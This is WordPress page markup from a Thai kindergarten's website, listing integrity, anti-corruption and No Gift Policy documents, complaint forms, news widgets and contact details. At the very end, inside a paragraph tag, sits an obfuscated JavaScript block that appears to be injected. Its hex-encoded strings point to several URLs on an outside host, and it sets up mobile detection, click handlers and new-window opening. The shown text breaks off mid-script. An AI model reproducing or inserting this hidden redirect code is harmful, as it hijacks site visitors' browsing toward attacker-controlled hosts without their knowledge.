data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( 